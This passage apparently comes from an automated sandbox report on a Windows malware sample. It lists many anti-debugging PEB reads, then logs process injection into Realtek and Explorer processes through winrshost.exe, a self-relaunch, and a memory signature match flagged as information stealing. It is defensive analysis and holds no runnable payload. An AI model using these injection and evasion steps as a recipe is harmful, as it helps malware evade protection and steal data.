        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF75B mov eax, dword ptr fs:[00000030h]2_2_377AF75B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D2755 mov eax, dword ptr fs:[00000030h]2_2_377D2755
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D2755 mov eax, dword ptr fs:[00000030h]2_2_377D2755
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D2755 mov eax, dword ptr fs:[00000030h]2_2_377D2755
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D2755 mov ecx, dword ptr fs:[00000030h]2_2_377D2755
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D2755 mov eax, dword ptr fs:[00000030h]2_2_377D2755
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D2755 mov eax, dword ptr fs:[00000030h]2_2_377D2755
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EA750 mov eax, dword ptr fs:[00000030h]2_2_377EA750
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E174A mov eax, dword ptr fs:[00000030h]2_2_377E174A
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378817BC mov eax, dword ptr fs:[00000030h]2_2_378817BC
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E3740 mov eax, dword ptr fs:[00000030h]2_2_377E3740
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786F7CF mov eax, dword ptr fs:[00000030h]2_2_3786F7CF
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D9723 mov eax, dword ptr fs:[00000030h]2_2_377D9723
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B471B mov eax, dword ptr fs:[00000030h]2_2_377B471B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B471B mov eax, dword ptr fs:[00000030h]2_2_377B471B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D270D mov eax, dword ptr fs:[00000030h]2_2_377D270D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D270D mov eax, dword ptr fs:[00000030h]2_2_377D270D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D270D mov eax, dword ptr fs:[00000030h]2_2_377D270D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BD700 mov ecx, dword ptr fs:[00000030h]2_2_377BD700
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787970B mov eax, dword ptr fs:[00000030h]2_2_3787970B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787970B mov eax, dword ptr fs:[00000030h]2_2_3787970B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786F717 mov eax, dword ptr fs:[00000030h]2_2_3786F717
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE7E0 mov eax, dword ptr fs:[00000030h]2_2_377DE7E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B37E4 mov eax, dword ptr fs:[00000030h]2_2_377B37E4
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B37E4 mov eax, dword ptr fs:[00000030h]2_2_377B37E4
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B37E4 mov eax, dword ptr fs:[00000030h]2_2_377B37E4
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B37E4 mov eax, dword ptr fs:[00000030h]2_2_377B37E4
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B37E4 mov eax, dword ptr fs:[00000030h]2_2_377B37E4
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B37E4 mov eax, dword ptr fs:[00000030h]2_2_377B37E4
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B37E4 mov eax, dword ptr fs:[00000030h]2_2_377B37E4
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785E750 mov eax, dword ptr fs:[00000030h]2_2_3785E750
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B07A7 mov eax, dword ptr fs:[00000030h]2_2_377B07A7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E1796 mov eax, dword ptr fs:[00000030h]2_2_377E1796
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E1796 mov eax, dword ptr fs:[00000030h]2_2_377E1796
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786F68C mov eax, dword ptr fs:[00000030h]2_2_3786F68C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B0670 mov eax, dword ptr fs:[00000030h]2_2_377B0670
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2670 mov eax, dword ptr fs:[00000030h]2_2_377F2670
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2670 mov eax, dword ptr fs:[00000030h]2_2_377F2670
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783C691 mov eax, dword ptr fs:[00000030h]2_2_3783C691
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E666D mov esi, dword ptr fs:[00000030h]2_2_377E666D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E666D mov eax, dword ptr fs:[00000030h]2_2_377E666D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E666D mov eax, dword ptr fs:[00000030h]2_2_377E666D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A7662 mov eax, dword ptr fs:[00000030h]2_2_377A7662
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A7662 mov eax, dword ptr fs:[00000030h]2_2_377A7662
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A7662 mov eax, dword ptr fs:[00000030h]2_2_377A7662
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C3660 mov eax, dword ptr fs:[00000030h]2_2_377C3660
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C3660 mov eax, dword ptr fs:[00000030h]2_2_377C3660
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C3660 mov eax, dword ptr fs:[00000030h]2_2_377C3660
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B965A mov eax, dword ptr fs:[00000030h]2_2_377B965A
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B965A mov eax, dword ptr fs:[00000030h]2_2_377B965A
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E265C mov eax, dword ptr fs:[00000030h]2_2_377E265C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E265C mov ecx, dword ptr fs:[00000030h]2_2_377E265C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E265C mov eax, dword ptr fs:[00000030h]2_2_377E265C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E5654 mov eax, dword ptr fs:[00000030h]2_2_377E5654
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378786A8 mov eax, dword ptr fs:[00000030h]2_2_378786A8
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378786A8 mov eax, dword ptr fs:[00000030h]2_2_378786A8
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AD64A mov eax, dword ptr fs:[00000030h]2_2_377AD64A
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AD64A mov eax, dword ptr fs:[00000030h]2_2_377AD64A
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B3640 mov eax, dword ptr fs:[00000030h]2_2_377B3640
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CF640 mov eax, dword ptr fs:[00000030h]2_2_377CF640
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CF640 mov eax, dword ptr fs:[00000030h]2_2_377CF640
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CF640 mov eax, dword ptr fs:[00000030h]2_2_377CF640
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EC640 mov eax, dword ptr fs:[00000030h]2_2_377EC640
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EC640 mov eax, dword ptr fs:[00000030h]2_2_377EC640
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EF63F mov eax, dword ptr fs:[00000030h]2_2_377EF63F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EF63F mov eax, dword ptr fs:[00000030h]2_2_377EF63F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787A6C0 mov eax, dword ptr fs:[00000030h]2_2_3787A6C0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378586C2 mov eax, dword ptr fs:[00000030h]2_2_378586C2
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B0630 mov eax, dword ptr fs:[00000030h]2_2_377B0630
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B5622 mov eax, dword ptr fs:[00000030h]2_2_377B5622
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B5622 mov eax, dword ptr fs:[00000030h]2_2_377B5622
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EC620 mov eax, dword ptr fs:[00000030h]2_2_377EC620
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782C6F2 mov eax, dword ptr fs:[00000030h]2_2_3782C6F2
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782C6F2 mov eax, dword ptr fs:[00000030h]2_2_3782C6F2
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E360F mov eax, dword ptr fs:[00000030h]2_2_377E360F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DD600 mov eax, dword ptr fs:[00000030h]2_2_377DD600
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DD600 mov eax, dword ptr fs:[00000030h]2_2_377DD600
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786F607 mov eax, dword ptr fs:[00000030h]2_2_3786F607
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37884600 mov eax, dword ptr fs:[00000030h]2_2_37884600
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37843608 mov eax, dword ptr fs:[00000030h]2_2_37843608
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37843608 mov eax, dword ptr fs:[00000030h]2_2_37843608
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37843608 mov eax, dword ptr fs:[00000030h]2_2_37843608
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37843608 mov eax, dword ptr fs:[00000030h]2_2_37843608
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37843608 mov eax, dword ptr fs:[00000030h]2_2_37843608
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37843608 mov eax, dword ptr fs:[00000030h]2_2_37843608
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A96E0 mov eax, dword ptr fs:[00000030h]2_2_377A96E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A96E0 mov eax, dword ptr fs:[00000030h]2_2_377A96E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BC6E0 mov eax, dword ptr fs:[00000030h]2_2_377BC6E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B56E0 mov eax, dword ptr fs:[00000030h]2_2_377B56E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B56E0 mov eax, dword ptr fs:[00000030h]2_2_377B56E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B56E0 mov eax, dword ptr fs:[00000030h]2_2_377B56E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D66E0 mov eax, dword ptr fs:[00000030h]2_2_377D66E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D66E0 mov eax, dword ptr fs:[00000030h]2_2_377D66E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785D62C mov ecx, dword ptr fs:[00000030h]2_2_3785D62C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785D62C mov ecx, dword ptr fs:[00000030h]2_2_3785D62C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785D62C mov eax, dword ptr fs:[00000030h]2_2_3785D62C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DD6D0 mov eax, dword ptr fs:[00000030h]2_2_377DD6D0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37838633 mov esi, dword ptr fs:[00000030h]2_2_37838633
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37838633 mov eax, dword ptr fs:[00000030h]2_2_37838633
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37838633 mov eax, dword ptr fs:[00000030h]2_2_37838633
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B06CF mov eax, dword ptr fs:[00000030h]2_2_377B06CF
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B8690 mov eax, dword ptr fs:[00000030h]2_2_377B8690
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786F582 mov eax, dword ptr fs:[00000030h]2_2_3786F582
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E588 mov eax, dword ptr fs:[00000030h]2_2_3782E588
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E588 mov eax, dword ptr fs:[00000030h]2_2_3782E588
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783C592 mov eax, dword ptr fs:[00000030h]2_2_3783C592
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CC560 mov eax, dword ptr fs:[00000030h]2_2_377CC560
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378385AA mov eax, dword ptr fs:[00000030h]2_2_378385AA
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B754C mov eax, dword ptr fs:[00000030h]2_2_377B754C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B254C mov eax, dword ptr fs:[00000030h]2_2_377B254C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CE547 mov eax, dword ptr fs:[00000030h]2_2_377CE547
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E6540 mov eax, dword ptr fs:[00000030h]2_2_377E6540
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E8540 mov eax, dword ptr fs:[00000030h]2_2_377E8540
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A753F mov eax, dword ptr fs:[00000030h]2_2_377A753F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A753F mov eax, dword ptr fs:[00000030h]2_2_377A753F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A753F mov eax, dword ptr fs:[00000030h]2_2_377A753F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378305C6 mov eax, dword ptr fs:[00000030h]2_2_378305C6
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2539 mov eax, dword ptr fs:[00000030h]2_2_377F2539
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B3536 mov eax, dword ptr fs:[00000030h]2_2_377B3536
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B3536 mov eax, dword ptr fs:[00000030h]2_2_377B3536
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C252B mov eax, dword ptr fs:[00000030h]2_2_377C252B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C252B mov eax, dword ptr fs:[00000030h]2_2_377C252B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C252B mov eax, dword ptr fs:[00000030h]2_2_377C252B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C252B mov eax, dword ptr fs:[00000030h]2_2_377C252B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C252B mov eax, dword ptr fs:[00000030h]2_2_377C252B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C252B mov eax, dword ptr fs:[00000030h]2_2_377C252B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C252B mov eax, dword ptr fs:[00000030h]2_2_377C252B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E1527 mov eax, dword ptr fs:[00000030h]2_2_377E1527
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EF523 mov eax, dword ptr fs:[00000030h]2_2_377EF523
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D1514 mov eax, dword ptr fs:[00000030h]2_2_377D1514
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D1514 mov eax, dword ptr fs:[00000030h]2_2_377D1514
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D1514 mov eax, dword ptr fs:[00000030h]2_2_377D1514
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D1514 mov eax, dword ptr fs:[00000030h]2_2_377D1514
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D1514 mov eax, dword ptr fs:[00000030h]2_2_377D1514
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D1514 mov eax, dword ptr fs:[00000030h]2_2_377D1514
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EC50D mov eax, dword ptr fs:[00000030h]2_2_377EC50D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EC50D mov eax, dword ptr fs:[00000030h]2_2_377EC50D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE507 mov eax, dword ptr fs:[00000030h]2_2_377DE507
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE507 mov eax, dword ptr fs:[00000030h]2_2_377DE507
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE507 mov eax, dword ptr fs:[00000030h]2_2_377DE507
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE507 mov eax, dword ptr fs:[00000030h]2_2_377DE507
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE507 mov eax, dword ptr fs:[00000030h]2_2_377DE507
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE507 mov eax, dword ptr fs:[00000030h]2_2_377DE507
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE507 mov eax, dword ptr fs:[00000030h]2_2_377DE507
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE507 mov eax, dword ptr fs:[00000030h]2_2_377DE507
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B2500 mov eax, dword ptr fs:[00000030h]2_2_377B2500
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783C5FC mov eax, dword ptr fs:[00000030h]2_2_3783C5FC
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E15EF mov eax, dword ptr fs:[00000030h]2_2_377E15EF
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EA5E7 mov ebx, dword ptr fs:[00000030h]2_2_377EA5E7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EA5E7 mov eax, dword ptr fs:[00000030h]2_2_377EA5E7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BB5E0 mov eax, dword ptr fs:[00000030h]2_2_377BB5E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BB5E0 mov eax, dword ptr fs:[00000030h]2_2_377BB5E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BB5E0 mov eax, dword ptr fs:[00000030h]2_2_377BB5E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BB5E0 mov eax, dword ptr fs:[00000030h]2_2_377BB5E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BB5E0 mov eax, dword ptr fs:[00000030h]2_2_377BB5E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BB5E0 mov eax, dword ptr fs:[00000030h]2_2_377BB5E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783C51D mov eax, dword ptr fs:[00000030h]2_2_3783C51D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov ecx, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov ecx, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E65D0 mov eax, dword ptr fs:[00000030h]2_2_377E65D0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EC5C6 mov eax, dword ptr fs:[00000030h]2_2_377EC5C6
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF5C7 mov eax, dword ptr fs:[00000030h]2_2_377AF5C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF5C7 mov eax, dword ptr fs:[00000030h]2_2_377AF5C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF5C7 mov eax, dword ptr fs:[00000030h]2_2_377AF5C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF5C7 mov eax, dword ptr fs:[00000030h]2_2_377AF5C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF5C7 mov eax, dword ptr fs:[00000030h]2_2_377AF5C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF5C7 mov eax, dword ptr fs:[00000030h]2_2_377AF5C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF5C7 mov eax, dword ptr fs:[00000030h]2_2_377AF5C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF5C7 mov eax, dword ptr fs:[00000030h]2_2_377AF5C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF5C7 mov eax, dword ptr fs:[00000030h]2_2_377AF5C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B45B0 mov eax, dword ptr fs:[00000030h]2_2_377B45B0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B45B0 mov eax, dword ptr fs:[00000030h]2_2_377B45B0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787A553 mov eax, dword ptr fs:[00000030h]2_2_3787A553
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3788B55F mov eax, dword ptr fs:[00000030h]2_2_3788B55F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3788B55F mov eax, dword ptr fs:[00000030h]2_2_3788B55F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E2594 mov eax, dword ptr fs:[00000030h]2_2_377E2594
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EA580 mov eax, dword ptr fs:[00000030h]2_2_377EA580
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EA580 mov eax, dword ptr fs:[00000030h]2_2_377EA580
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E9580 mov eax, dword ptr fs:[00000030h]2_2_377E9580

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\rResegregation.exe | Section loaded: NULL target: C:\Program Files (x86)\szoXoDzskkTxxhZpoRGYohtCWuXRRKBotonSSvXwdmZhRyVfAEJdGWdZEtpIlJlyetsE\xkRPErfRaAOsoZkVUeZdSyiUrenXLw.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\rResegregation.exe | Section loaded: NULL target: C:\Windows\SysWOW64\winrshost.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\winrshost.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write
        Source: C:\Windows\SysWOW64\winrshost.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\winrshost.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\winrshost.exe | Thread register set: target process: 7920
        Source: C:\Windows\SysWOW64\winrshost.exe | Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
        Source: C:\Users\user\Desktop\rResegregation.exe | Process created: C:\Users\user\Desktop\rResegregation.exe C:\Users\user\Desktop\rResegregation.exe
        Source: C:\Program Files (x86)\szoXoDzskkTxxhZpoRGYohtCWuXRRKBotonSSvXwdmZhRyVfAEJdGWdZEtpIlJlyetsE\xkRPErfRaAOsoZkVUeZdSyiUrenXLw.exe | Process created: C:\Windows\SysWOW64\winrshost.exe C:\Windows\SysWOW64\winrshost.exe
        Source: RAVCpl64.exe, 00000006.00000000.28896719258.0000000000EA1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
        Source: RAVCpl64.exe, 00000006.00000000.28896719258.0000000000EA1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
        Source: RAVCpl64.exe, 00000006.00000000.28896719258.0000000000EA1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
        Source: RAVCpl64.exe, 00000006.00000000.28896719258.0000000000EA1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\rResegregation.exe | Code function: 0_2_00405D2E GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA

        Stealing of Sensitive Information

        Source: Yara match | File source: 00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
